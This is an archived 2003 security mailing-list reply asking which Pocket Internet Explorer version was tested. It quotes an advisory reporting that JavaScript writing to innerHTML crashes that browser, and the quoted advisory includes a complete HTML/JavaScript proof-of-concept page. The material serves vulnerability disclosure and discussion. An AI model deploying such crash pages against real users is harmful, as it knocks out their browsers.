|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
angus_at_onnow.net
Date: Fri Jan 03 2003 - 09:17:06 CST
Can you be specific about what version of PIE you tested this vulnerability on?
If you look at the following web pages you will see that PIE only supports a
few HTML tags.
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q161319
http://support.microsoft.com/default.aspx?scid=kb;EN-US;158479
Specifically the <SCRIPT> tag is not supported in PIE 1.0, 1.1 and 2.0. Only
PIE 3.0 supports the <SCRIPT> tag.
Does PIE 3.0 crash?
> PROBLEM DESCRIPTION:
> Calling a javascript from an object written to same page with the
> object.innerHTML function causes Pocket Internet Explorer (PIE from now
> on)
> to crash.
>
> SOFTWARE AFFECTED:
> Only PIE is affected, "regular" IE will show the pages as intented.
>
> EXAMPLE:
> <html>
> <head>
> <title>Crash PIE</title>
> <script language="Javascript">
> function displayPage(page){
> if(page=="onload"){
> main.innerHTML="<a href=\"#\"
> onClick=\"displayPage('crash');\">Crash
> me</a>";
> }
> if(page=="crash"){
> main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">You
> are
> going down!</a>";
> }
> }
> </script>
> </head>
> <body onLoad="displayPage('onload');">
> <hr>
> <span id="main"></span>
> </body></html>
>
> SOLUTIONS:
> no known patch available
>
>
> Problem was reported to MS (Norway) 2nd of January 2003.
>
>
> Chris
>
>
>
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]